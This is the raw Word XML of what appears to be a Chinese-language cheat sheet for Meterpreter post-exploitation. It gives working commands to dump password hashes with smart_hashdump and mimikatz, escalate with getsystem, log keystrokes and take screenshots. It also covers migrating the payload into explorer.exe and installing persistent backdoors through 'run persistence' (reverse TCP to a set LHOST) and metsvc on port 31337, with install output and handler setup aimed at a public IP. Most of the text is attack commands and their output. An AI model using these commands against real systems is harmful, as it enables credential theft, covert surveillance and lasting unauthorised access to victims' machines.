    <w:p w:rsidR="005D5318" w:rsidRPr="005D5318" w:rsidRDefault="00C22606" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22606">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>run post/windows/gather/smart_hashdum</w:t>
      </w:r>
      <w:r w:rsidR="009216D7" w:rsidRPr="00C22606">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="005D5318" w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提取密码散列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00A726D5">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入mimikatz模块以后，</w:t>
      </w:r>
      <w:r w:rsidR="00B85D77">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22606">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>mimikatz_command -f samdump::hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）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edit 提供一个VIM编辑器来对文档进行更改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getsystem 尝试自动提权</w:t>
      </w:r>
      <w:r w:rsidR="00FF1063">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(如果getsystem</w:t>
      </w:r>
      <w:r w:rsidR="00FF1063">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> –h失效</w:t>
      </w:r>
      <w:r w:rsidR="00FF1063">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00FF1063">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>表明还没有加载pri模块需要先在metepreter中use priv</w:t>
      </w:r>
      <w:r w:rsidR="00FF1063">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)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idletime 显示机器不活动时间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lastRenderedPageBreak/>
        <w:t>keyscan_dump 要先运行keyscan_start，</w:t>
      </w:r>
      <w:r w:rsidR="00BF5226">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在一定时间内显示</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从目标计算机上捕捉的击键。</w:t>
      </w:r>
      <w:r w:rsidR="00BF5226">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00BF5226">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r w:rsidR="00BF5226">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;是回车键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keyscan_stop 停止键盘记录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ps 打印进程列表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kill PID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reboot/shutdown 重启/关机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screenshot 获取屏幕截图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search -f file_name 搜索指定文件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sysinfo 获取系统相关信息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execute -f xxxx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getuid 当前登录账户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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getpid 当前进程id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C248A" w:rsidRPr="005D5318" w:rsidRDefault="002C248A" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>shell 进入开一个shell给自己</w:t>
      </w:r>
      <w:r w:rsidR="00450B39">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00450B39">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>使用exit退出</w:t>
      </w:r>
      <w:r w:rsidR="00F4020D">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C248A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ps 查看进程标志符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1596">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>migrate pid 将攻击载荷的进程迁移到其他进程中，比如说explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB6530" w:rsidRPr="00DB6530" w:rsidRDefault="00DB6530" w:rsidP="00DB6530">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB6530">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>csrss.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6530">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6530">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>vchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6530">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6530">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6530">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>终端中开的多</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="00425898" w:rsidRDefault="000D3F01" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00425898">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>run per</w:t>
      </w:r>
      <w:r w:rsidR="005D5318" w:rsidRPr="00425898">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sistence 调用模块安装一个持久化后门（vbs脚本</w:t>
      </w:r>
      <w:r w:rsidR="003832AB" w:rsidRPr="00425898">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>并</w:t>
      </w:r>
      <w:r w:rsidR="00333764">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r w:rsidR="003832AB" w:rsidRPr="00425898">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>将路径写入注册表</w:t>
      </w:r>
      <w:r w:rsidR="00333764">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>实现开机启动</w:t>
      </w:r>
      <w:r w:rsidR="005D5318" w:rsidRPr="00425898">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3F01" w:rsidRDefault="000D3F01" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>run persistence -A -L c:\\</w:t>
      </w:r>
      <w:r w:rsidR="003D67F5">
        <w:t xml:space="preserve"> -U</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -i 30 -p 443 -r 192.168.1.124</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRPr="00C755D4" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C755D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C755D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">   -A        Automatically start a matching exploit/multi/handler to connect to the agent</w:t>
      </w:r>
      <w:r w:rsidR="00B46B2A" w:rsidRPr="00C755D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  然后等一下就会多出一个session</w:t>
      </w:r>
      <w:r w:rsidR="00965FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00965FD8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>于是</w:t>
      </w:r>
      <w:r w:rsidR="00965FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>1G的服务器因为内存就自己崩了</w:t>
      </w:r>
      <w:r w:rsidR="008D55B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>（这的仅仅就两个连接）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRPr="002005C6" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002005C6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    -L &lt;opt&gt;  Location in target host to write payload to, if none %TEMP% will be used.</w:t>
      </w:r>
      <w:r w:rsidR="00B46B2A" w:rsidRPr="002005C6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46B2A" w:rsidRPr="002005C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="00B46B2A" w:rsidRPr="002005C6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>TEMP</w:t>
      </w:r>
      <w:r w:rsidR="00B46B2A" w:rsidRPr="002005C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="00B46B2A" w:rsidRPr="002005C6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Users\</w:t>
      </w:r>
      <w:r w:rsidR="00B97B2B" w:rsidRPr="002005C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidR="00B46B2A" w:rsidRPr="002005C6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>\AppData\Local\Temp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -P &lt;opt&gt;  Payload to use, default is windows/meterpreter/reverse_tcp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001459F1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-S        Automatically start the agent on boot as a service (with SYSTEM privileges)</w:t>
      </w:r>
      <w:r w:rsidR="001459F1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  将后门作为一个服务从而自动启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -T &lt;opt&gt;  Alternate executable template to use</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRPr="001459F1" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="001459F1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -U        </w:t>
      </w:r>
      <w:r w:rsidR="001459F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>后门</w:t>
      </w:r>
      <w:r w:rsidR="001459F1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>在用户登录系统的时候自动启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -X        Automatically start the agent when the system boots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -h        This help menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRPr="00FF06AC" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF06AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-i &lt;opt&gt;  The interval in seconds between each connection attempt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="0058226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p &lt;opt&gt;  </w:t>
      </w:r>
      <w:r w:rsidR="0058226B" w:rsidRPr="0058226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidR="0058226B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="0058226B" w:rsidRPr="0058226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>PORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D67F5" w:rsidRPr="0058226B" w:rsidRDefault="003D67F5" w:rsidP="003D67F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0058226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">-r &lt;opt&gt;  </w:t>
      </w:r>
      <w:r w:rsidR="0058226B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>设置L</w:t>
      </w:r>
      <w:r w:rsidR="0058226B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>HOST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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run metsvc -A 调用模块安装一个持久化</w:t>
      </w:r>
      <w:r w:rsidR="006B7628" w:rsidRPr="00C769E4">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="006B7628" w:rsidRPr="00C769E4">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>86</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后门（在31337端口创建了一个服务然后上传了恶意软件），以后只要use exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="00FF06AC" w:rsidRPr="00FF06AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（set payload windows/metsvc_bind_tcp）</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置好端口是</w:t>
      </w:r>
      <w:r w:rsidRPr="00332CC1">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>31337</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以来连接了</w:t>
      </w:r>
      <w:r w:rsidR="00B32C57">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。默认是在当前的目录下产生三个</w:t>
      </w:r>
      <w:r w:rsidR="008B675E">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。但是安装失败</w:t>
      </w:r>
      <w:r w:rsidR="00290703">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290703" w:rsidRPr="00290703" w:rsidRDefault="00290703" w:rsidP="00290703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290703">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\Local\Temp\iYSgKhEeFcfW...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290703" w:rsidRPr="00290703" w:rsidRDefault="00290703" w:rsidP="00290703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290703">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>[*]  &gt;&gt; Uploading metsrv.x86.dll...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290703" w:rsidRPr="00290703" w:rsidRDefault="00290703" w:rsidP="00290703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290703">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>[*]  &gt;&gt; Uploading metsvc-server.exe...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290703" w:rsidRPr="00290703" w:rsidRDefault="00290703" w:rsidP="00290703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290703">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>[*]  &gt;&gt; Uploading metsvc.exe...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290703" w:rsidRPr="00290703" w:rsidRDefault="00290703" w:rsidP="00290703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290703">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[*] Starting the service...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290703" w:rsidRPr="00290703" w:rsidRDefault="00290703" w:rsidP="00290703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290703">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> * Installing service metsvc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290703" w:rsidRDefault="00290703" w:rsidP="00290703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290703">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Cannot create service (0x00000431)</w:t>
      </w:r>
      <w:r w:rsidR="00E25F66">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>如果已经有这个服务了就会有这个错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7628" w:rsidRDefault="00290703" w:rsidP="005A19C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>似乎并没有什么影响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照样还是可以连接的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除非开启了win7神奇的防护墙</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D601F2" w:rsidRPr="00D601F2" w:rsidRDefault="00D601F2" w:rsidP="00D601F2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D601F2">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D601F2" w:rsidRDefault="00D601F2" w:rsidP="00D601F2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D601F2">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>set payload windows/metsvc_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D601F2" w:rsidRPr="00D601F2" w:rsidRDefault="004B3E2C" w:rsidP="00D601F2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D601F2" w:rsidRPr="00D601F2">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>set payload windows/metsvc_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D601F2" w:rsidRPr="00D601F2" w:rsidRDefault="00D601F2" w:rsidP="00D601F2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D601F2">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>set RHOST 125.71.200.26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D601F2" w:rsidRDefault="00D601F2" w:rsidP="006A01C0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D601F2">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>set LPORT 31337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00333764" w:rsidRPr="005D5318" w:rsidRDefault="00333764" w:rsidP="006A01C0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>也可能是</w:t>
      </w:r>
